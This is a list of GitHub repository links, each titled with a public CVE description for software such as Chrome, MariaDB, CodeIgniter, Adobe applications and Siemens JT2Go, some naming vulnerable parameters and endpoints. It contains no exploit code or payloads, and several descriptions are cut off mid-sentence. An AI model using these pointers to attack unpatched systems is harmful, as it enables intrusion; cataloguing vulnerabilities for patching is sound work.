**An integer overflow that leads to a use-after-free in Blink Storage in Google Chrome on Linux prior to 73.0.3683.75 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5788](https://github.com/Live-Hack-CVE/CVE-2019-5788) create time: 2022-12-29T06:58:09Z

**An integer overflow leading to an incorrect capacity of a buffer in JavaScript in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5790](https://github.com/Live-Hack-CVE/CVE-2019-5790) create time: 2022-12-29T06:58:05Z

**Integer overflow in PDFium in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially perform out of bounds memory access via a crafted PDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5792](https://github.com/Live-Hack-CVE/CVE-2019-5792) create time: 2022-12-29T06:58:00Z

**Insufficient policy enforcement in extensions in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to initiate the extensions installation user interface via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5793](https://github.com/Live-Hack-CVE/CVE-2019-5793) create time: 2022-12-29T06:57:57Z

**Lack of correct bounds checking in Skia in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5798](https://github.com/Live-Hack-CVE/CVE-2019-5798) create time: 2022-12-29T06:57:53Z

**Integer overflow in PDFium in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially perform out of bounds memory access via a crafted PDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5795](https://github.com/Live-Hack-CVE/CVE-2019-5795) create time: 2022-12-29T06:57:49Z

**Incorrect inheritance of a new document's policy in Content Security Policy in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to bypass content security policy via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5799](https://github.com/Live-Hack-CVE/CVE-2019-5799) create time: 2022-12-29T06:57:45Z

**Insufficient policy enforcement in Blink in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to bypass content security policy via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5800](https://github.com/Live-Hack-CVE/CVE-2019-5800) create time: 2022-12-29T06:57:28Z

**Incorrect eliding of URLs in Omnibox in Google Chrome on iOS prior to 73.0.3683.75 allowed a remote attacker to perform domain spoofing via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5801](https://github.com/Live-Hack-CVE/CVE-2019-5801) create time: 2022-12-29T06:57:24Z

**Insufficient policy enforcement in Content Security Policy in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to bypass content security policy via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5803](https://github.com/Live-Hack-CVE/CVE-2019-5803) create time: 2022-12-29T06:57:21Z

**Incorrect command line processing in Chrome in Google Chrome prior to 73.0.3683.75 allowed a local attacker to perform domain spoofing via a crafted domain name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5804](https://github.com/Live-Hack-CVE/CVE-2019-5804) create time: 2022-12-29T06:57:17Z

**Use-after-free in PDFium in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5805](https://github.com/Live-Hack-CVE/CVE-2019-5805) create time: 2022-12-29T06:57:13Z

**Integer overflow in ANGLE in Google Chrome on Windows prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5806](https://github.com/Live-Hack-CVE/CVE-2019-5806) create time: 2022-12-29T06:57:09Z

**Object lifetime issue in V8 in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5807](https://github.com/Live-Hack-CVE/CVE-2019-5807) create time: 2022-12-29T06:57:05Z

**Information leak in autofill in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5810](https://github.com/Live-Hack-CVE/CVE-2019-5810) create time: 2022-12-29T06:56:41Z

**Use after free in Blink in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5808](https://github.com/Live-Hack-CVE/CVE-2019-5808) create time: 2022-12-29T06:56:37Z

**Use after free in file chooser in Google Chrome prior to 74.0.3729.108 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5809](https://github.com/Live-Hack-CVE/CVE-2019-5809) create time: 2022-12-29T06:56:33Z

**Incorrect handling of CORS in ServiceWorker in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to bypass same origin policy via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5811](https://github.com/Live-Hack-CVE/CVE-2019-5811) create time: 2022-12-29T06:56:26Z

**Insufficient policy enforcement in Blink in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5814](https://github.com/Live-Hack-CVE/CVE-2019-5814) create time: 2022-12-29T06:56:22Z

**Process lifetime issue in Chrome in Google Chrome on Android prior to 74.0.3729.108 allowed a remote attacker to potentially persist an exploited process via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5816](https://github.com/Live-Hack-CVE/CVE-2019-5816) create time: 2022-12-29T06:56:18Z

**Uninitialized data in media in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted video file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5818](https://github.com/Live-Hack-CVE/CVE-2019-5818) create time: 2022-12-29T06:56:15Z

**Heap buffer overflow in ANGLE in Google Chrome on Windows prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5817](https://github.com/Live-Hack-CVE/CVE-2019-5817) create time: 2022-12-29T06:56:10Z

**Cross-site request forgery (CSRF) vulnerability in Online Lesson Booking 0.8.6 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5973](https://github.com/Live-Hack-CVE/CVE-2019-5973) create time: 2022-12-29T06:56:00Z

**OpenSMTPD before 6.6.4 allows remote code execution because of an out-of-bounds read in mta_io in mta_session.c for multi-line replies. Although this vulnerability affects the client side of OpenSMTPD, it is possible to attack a server because the server code launches the client code during bounce handling. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8794](https://github.com/Live-Hack-CVE/CVE-2020-8794) create time: 2022-12-29T07:02:45Z

**Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9402](https://github.com/Live-Hack-CVE/CVE-2020-9402) create time: 2022-12-29T07:01:33Z

**Older firmware versions (FW1 up to FW10) of the WAGO PLC family 750-88x and 750-352 are vulnerable for a special denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12516](https://github.com/Live-Hack-CVE/CVE-2020-12516) create time: 2022-12-29T07:01:29Z

**AEM's Cloud Service offering, as well as version 6.5.6.0 (and below), are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24445](https://github.com/Live-Hack-CVE/CVE-2020-24445) create time: 2022-12-29T07:01:25Z

**Two cross-site scripting vulnerabilities were fixed in Bodhi 5.6.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15855](https://github.com/Live-Hack-CVE/CVE-2020-15855) create time: 2022-12-29T07:00:16Z

**A buffer underflow vulnerability exists in the way Hword of Hancom Office 2020 version 11.0.0.5357 parses XML-based office files. A specially-crafted malformed file can cause memory corruption by using memory before buffer start, which can lead to code execution. A victim would need to access a malicious file to trigge CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33896](https://github.com/Live-Hack-CVE/CVE-2022-33896) create time: 2022-12-29T06:55:23Z

**Cross-Site Scripting vulnerability on Micro Focus ArcSight Logger product, affecting version 7.1. The vulnerability could be remotely exploited resulting in Cross-Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25834](https://github.com/Live-Hack-CVE/CVE-2020-25834) create time: 2022-12-29T06:25:15Z

**Adobe Media Encoder version 15.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interactio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36015](https://github.com/Live-Hack-CVE/CVE-2021-36015) create time: 2022-12-29T07:06:40Z

**Adobe Illustrator version 25.2.3 (and earlier) is affected by an memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interacti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36009](https://github.com/Live-Hack-CVE/CVE-2021-36009) create time: 2022-12-29T07:06:36Z

**Adobe After Effects version 18.2.1 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interact CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36017](https://github.com/Live-Hack-CVE/CVE-2021-36017) create time: 2022-12-29T07:06:32Z

**If remote logging is not used, the worker (in the case of CeleryExecutor) or the scheduler (in the case of LocalExecutor) runs a Flask logging server and is listening on a specific port and also binds on 0.0.0.0 by default. This logging server had no authentication and allows reading log files of DAG jobs. This issue a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35936](https://github.com/Live-Hack-CVE/CVE-2021-35936) create time: 2022-12-29T07:06:29Z

**Adobe Character Animator version 4.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user intera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36000](https://github.com/Live-Hack-CVE/CVE-2021-36000) create time: 2022-12-29T07:06:25Z

**Adobe Prelude version 10.0 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35999](https://github.com/Live-Hack-CVE/CVE-2021-35999) create time: 2022-12-29T07:06:22Z

**Adobe Premiere Pro version 15.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35997](https://github.com/Live-Hack-CVE/CVE-2021-35997) create time: 2022-12-29T07:06:18Z

**Adobe After Effects version 18.2.1 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interact CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35996](https://github.com/Live-Hack-CVE/CVE-2021-35996) create time: 2022-12-29T07:06:14Z

**A flaw was found in Ansible, where a user's controller is vulnerable to template injection. This issue can occur through facts used in the template if the user is trying to put templates in multi-line YAML strings and the facts being handled do not routinely include special template characters. This flaw allows attacke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3583](https://github.com/Live-Hack-CVE/CVE-2021-3583) create time: 2022-12-29T07:06:11Z

**An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system avai CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3561](https://github.com/Live-Hack-CVE/CVE-2021-3561) create time: 2022-12-29T07:06:07Z

**A stack corruption bug was found in libtpms in versions before 0.7.2 and before 0.8.0 while decrypting data using RSA. This flaw could result in a SIGBUS (bad memory access) and termination of swtpm. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3569](https://github.com/Live-Hack-CVE/CVE-2021-3569) create time: 2022-12-29T07:06:02Z

**A flaw was found in the ptp4l program of the linuxptp package. When ptp4l is operating on a little-endian architecture as a PTP transparent clock, a remote attacker could send a crafted one-step sync message to cause an information leak or crash. The highest threat from this vulnerability is to data confidentiality and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3571](https://github.com/Live-Hack-CVE/CVE-2021-3571) create time: 2022-12-29T07:05:42Z

**A flaw was found in the ptp4l program of the linuxptp package. A missing length check when forwarding a PTP message between ports allows a remote attacker to cause an information leak, crash, or potentially remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as wel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3570](https://github.com/Live-Hack-CVE/CVE-2021-3570) create time: 2022-12-29T07:05:39Z

**An out of bounds flaw was found in GNU binutils objdump utility version 2.36. An attacker could use this flaw and pass a large section to avr_elf32_load_records_from_section() probably resulting in a crash or in some cases memory corruption. The highest threat from this vulnerability is to integrity as well as system a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3549](https://github.com/Live-Hack-CVE/CVE-2021-3549) create time: 2022-12-29T07:05:35Z

**A shell injection flaw was found in pglogical in versions before 2.3.4 and before 3.6.26. An attacker with CREATEDB privileges on a PostgreSQL server can craft a database name that allows execution of shell commands as the postgresql user when calling pglogical.create_subscription(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3515](https://github.com/Live-Hack-CVE/CVE-2021-3515) create time: 2022-12-29T07:05:21Z

**A flaw was found in Ansible where the secret information present in async_files are getting disclosed when the user changes the jobdir to a world readable directory. Any secret information in an async status file will be readable by a malicious user on that system. This flaw affects Ansible Tower 3.7 and Ansible Automa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3532](https://github.com/Live-Hack-CVE/CVE-2021-3532) create time: 2022-12-29T07:05:17Z

**Numerous exposed dangerous functions within Orion Core has allows for read-only SQL injection leading to privileged escalation. An attacker with low-user privileges may steal password hashes and password salt information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35234](https://github.com/Live-Hack-CVE/CVE-2021-35234) create time: 2022-12-29T07:05:14Z

**A heap buffer overflow was found in the floppy disk emulator of QEMU up to 6.0.0 (including). It could occur in fdctrl_transfer_handler() in hw/block/fdc.c while processing DMA read data transfers from the floppy drive to the guest system. A privileged guest user could use this flaw to crash the QEMU process on the hos CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3507](https://github.com/Live-Hack-CVE/CVE-2021-3507) create time: 2022-12-29T07:05:10Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the fixed-length heap-based b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34313](https://github.com/Live-Hack-CVE/CVE-2021-34313) create time: 2022-12-29T07:05:07Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in an out of bounds read past the end of an allocated buffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34308](https://github.com/Live-Hack-CVE/CVE-2021-34308) create time: 2022-12-29T07:05:03Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in a memory corruption condition. An attacker could leverage t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34306](https://github.com/Live-Hack-CVE/CVE-2021-34306) create time: 2022-12-29T07:04:59Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The Tiff_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34304](https://github.com/Live-Hack-CVE/CVE-2021-34304) create time: 2022-12-29T07:04:56Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Solid Edge SE2021 (All Versions < SE2021MP5), Teamcenter Visualization (All versions < V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34329](https://github.com/Live-Hack-CVE/CVE-2021-34329) create time: 2022-12-29T07:04:52Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Solid Edge SE2021 (All Versions < SE2021MP5), Teamcenter Visualization (All versions < V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34328](https://github.com/Live-Hack-CVE/CVE-2021-34328) create time: 2022-12-29T07:04:41Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Solid Edge SE2021 (All Versions < SE2021MP5), Teamcenter Visualization (All versions < V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing ASM files. This could result in an out CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34327](https://github.com/Live-Hack-CVE/CVE-2021-34327) create time: 2022-12-29T07:04:38Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data when parsing JT files. This could result in an out of bounds read past the end of an allocated buffer. An att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34325](https://github.com/Live-Hack-CVE/CVE-2021-34325) create time: 2022-12-29T07:04:35Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The VisDraw.dll library in affected applications lacks proper validation of user-supplied data when parsing J2K files. This could result in an out of bounds read past the end of an allocated buffer. An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34321](https://github.com/Live-Hack-CVE/CVE-2021-34321) create time: 2022-12-29T07:04:31Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data when parsing JT files. This could result in an out of bounds read past the end of an allocated buffer. An att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34320](https://github.com/Live-Hack-CVE/CVE-2021-34320) create time: 2022-12-29T07:04:28Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The BMP_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing PCX files. This could result in an out of bounds write past the fixed-length heap-based buf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34317](https://github.com/Live-Hack-CVE/CVE-2021-34317) create time: 2022-12-29T07:04:24Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the fixed-length heap-based b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34312](https://github.com/Live-Hack-CVE/CVE-2021-34312) create time: 2022-12-29T07:04:21Z

**Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /leave_system/classes/Master.php?f=delete_department. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41355](https://github.com/Live-Hack-CVE/CVE-2022-41355) create time: 2022-12-29T07:06:52Z

**A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. Affected is an unknown function of the file /Admin/login.php of the component POST Parameter Handler. The manipulation of the argument txtusername leads to sql injection. It is possible to launch the atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3414](https://github.com/Live-Hack-CVE/CVE-2022-3414) create time: 2022-12-29T07:06:47Z

**In certain Nedi products, a vulnerability in the web UI of NeDi login & Community login could allow an unauthenticated, remote attacker to affect the integrity of a device via a User Enumeration vulnerability. The vulnerability is due to insecure design, where a difference in forgot password utility could allow an atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40895](https://github.com/Live-Hack-CVE/CVE-2022-40895) create time: 2022-12-29T07:06:43Z

**Account Takeover :: when see the info i can see the hash pass i can creaked it ............... Account Takeover :: when see the info i can see the forgot_password_token the hacker can send the request and changed the pass CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3422](https://github.com/Live-Hack-CVE/CVE-2022-3422) create time: 2022-12-29T07:05:32Z

**Denial of Service in GitHub repository nocodb/nocodb prior to 0.92.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3423](https://github.com/Live-Hack-CVE/CVE-2022-3423) create time: 2022-12-29T07:05:28Z

**An SQL injection vulnerability issue was discovered in Sourcecodester Simple E-Learning System 1.0., in /vcs/classRoom.php?classCode=, classCode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40872](https://github.com/Live-Hack-CVE/CVE-2022-40872) create time: 2022-12-29T07:05:25Z

**Path traversal vulnerability in AtBroadcastReceiver in FactoryCamera prior to version 3.5.51 allows attackers to write arbitrary file as FactoryCamera privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39858](https://github.com/Live-Hack-CVE/CVE-2022-39858) create time: 2022-12-29T07:03:45Z

**Improper access control vulnerability in CameraTestActivity in FactoryCameraFB prior to version 3.5.51 allows attackers to access broadcasting Intent as system uid privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39857](https://github.com/Live-Hack-CVE/CVE-2022-39857) create time: 2022-12-29T07:03:41Z

**Implicit intent hijacking vulnerability in UPHelper library prior to version 3.0.12 allows attackers to access sensitive information via implicit intent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39859](https://github.com/Live-Hack-CVE/CVE-2022-39859) create time: 2022-12-29T07:03:38Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40835](https://github.com/Live-Hack-CVE/CVE-2022-40835) create time: 2022-12-29T07:03:34Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php or_not_like() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40834](https://github.com/Live-Hack-CVE/CVE-2022-40834) create time: 2022-12-29T07:03:31Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php or_where_in() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40833](https://github.com/Live-Hack-CVE/CVE-2022-40833) create time: 2022-12-29T07:03:27Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php having() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40832](https://github.com/Live-Hack-CVE/CVE-2022-40832) create time: 2022-12-29T07:03:23Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php like() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40831](https://github.com/Live-Hack-CVE/CVE-2022-40831) create time: 2022-12-29T07:03:20Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php where_not_in() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40830](https://github.com/Live-Hack-CVE/CVE-2022-40830) create time: 2022-12-29T07:03:16Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php or_like() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40829](https://github.com/Live-Hack-CVE/CVE-2022-40829) create time: 2022-12-29T07:03:13Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php or_where_not_in() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40828](https://github.com/Live-Hack-CVE/CVE-2022-40828) create time: 2022-12-29T07:03:09Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php where() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40827](https://github.com/Live-Hack-CVE/CVE-2022-40827) create time: 2022-12-29T07:03:06Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php or_having() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40826](https://github.com/Live-Hack-CVE/CVE-2022-40826) create time: 2022-12-29T07:03:02Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php where_in() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40825](https://github.com/Live-Hack-CVE/CVE-2022-40825) create time: 2022-12-29T07:02:59Z

**B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php or_where() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40824](https://github.com/Live-Hack-CVE/CVE-2022-40824) create time: 2022-12-29T07:02:55Z

**An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22651](https://github.com/Live-Hack-CVE/CVE-2022-22651) create time: 2022-12-29T07:02:09Z

**This issue was addressed with improved checks. This issue is fixed in Security Update 2022-001 Catalina, macOS Big Sur 11.6.3. A malicious application may be able to bypass certain Privacy preferences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30972](https://github.com/Live-Hack-CVE/CVE-2021-30972) create time: 2022-12-29T07:02:06Z

**MariaDB Server v10.6.3 and below was discovered to contain an use-after-free in the component Item_func_in::cleanup(), which is exploited via specially crafted SQL statements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27377](https://github.com/Live-Hack-CVE/CVE-2022-27377) create time: 2022-12-29T07:02:02Z

**MariaDB Server v10.6.3 and below was discovered to contain an use-after-free in the component VDec::VDec at /sql/sql_type.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27456](https://github.com/Live-Hack-CVE/CVE-2022-27456) create time: 2022-12-29T07:01:58Z

**MariaDB Server v10.6.3 and below was discovered to contain an use-after-free in the component Binary_string::free_buffer() at /sql/sql_string.h. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27458](https://github.com/Live-Hack-CVE/CVE-2022-27458) create time: 2022-12-29T07:01:54Z

**MariaDB Server v10.9 and below was discovered to contain a use-after-free via the component Binary_string::free_buffer() at /sql/sql_string.h. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27447](https://github.com/Live-Hack-CVE/CVE-2022-27447) create time: 2022-12-29T07:01:51Z

**There is an Assertion failure in MariaDB Server v10.9 and below via 'node->pcur->rel_pos == BTR_PCUR_ON' at /row/row0mysql.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27448](https://github.com/Live-Hack-CVE/CVE-2022-27448) create time: 2022-12-29T07:01:47Z

**An issue in the component Create_tmp_table::finalize of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27378](https://github.com/Live-Hack-CVE/CVE-2022-27378) create time: 2022-12-29T07:01:44Z

**An issue in the component Arg_comparator::compare_real_fixed of MariaDB Server v10.6.2 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27379](https://github.com/Live-Hack-CVE/CVE-2022-27379) create time: 2022-12-29T07:01:40Z

**Rockwell Automation Allen-Bradley PowerMonitor 1000 all versions. A remote attacker could inject arbitrary code into a targeted userâ??s web browser to gain access to the affected device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19615](https://github.com/Live-Hack-CVE/CVE-2018-19615) create time: 2022-12-29T06:20:17Z

